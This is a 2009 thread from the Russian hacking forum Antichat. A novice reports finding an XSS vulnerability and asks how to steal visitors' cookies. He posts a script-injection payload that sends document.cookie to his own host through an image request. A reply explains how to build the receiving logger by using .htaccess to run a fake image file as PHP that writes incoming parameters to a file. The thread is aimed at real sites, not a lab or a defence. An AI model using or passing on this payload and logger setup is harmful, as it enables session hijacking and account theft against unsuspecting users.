ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Нашел xss
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нашел xss
  #1  
Старый 20.11.2009, 01:19
Аватар для bogger
bogger
Познающий
Регистрация: 20.04.2008
Сообщений: 39
Провел на форуме:
382668

Репутация: 49
Unhappy Нашел xss
Нашел xss пытаюсь залить скрипт для сбора куков читал сдесь некоторые статьи где написано что надо вводить

Ввожу следующие

"><script>img = new Image();img.src="http://my site.org/s/HakNet.gif?"+document.cookie;</script>

и ни как не пойму почему картинка ?
и какой скрипт должен быть написан в картинке если вообще должен ? и после куда будут записыватся куки ? объясните пожалуйста , просто я в первые сталкиваюсь с этим
 
Ответить с цитированием

  #2  
Старый 20.11.2009, 01:52
Аватар для Godfather Bulan
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
Провел на форуме:
7469280

Репутация: 2389
Отправить сообщение для Godfather Bulan с помощью ICQ
По умолчанию
неужели снифф?
 
Ответить с цитированием

  #3  
Старый 20.11.2009, 09:40
Аватар для Proger10
Proger10
Познающий
Регистрация: 19.12.2008
Сообщений: 78
Провел на форуме:
184907

Репутация: 13
Отправить сообщение для Proger10 с помощью ICQ
По умолчанию
С помощью всемогущего .htaccess "говорим" серверу, что картинка это - php. В нутри картинки код примерно следующего смысла: все что передали как параметр писать в файл, ну и иногда для приличия выводим картинку. А картинка это самый безобитный файл :-), ну если хочется то и с txt так же можно сделать.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нашел XSS. Только вот? gramotey Болталка 8 06.04.2009 15:19
Нашел вот Xss только.... gramotey Болталка 7 02.04.2009 13:23
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? Sky Форумы 3 04.11.2004 15:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ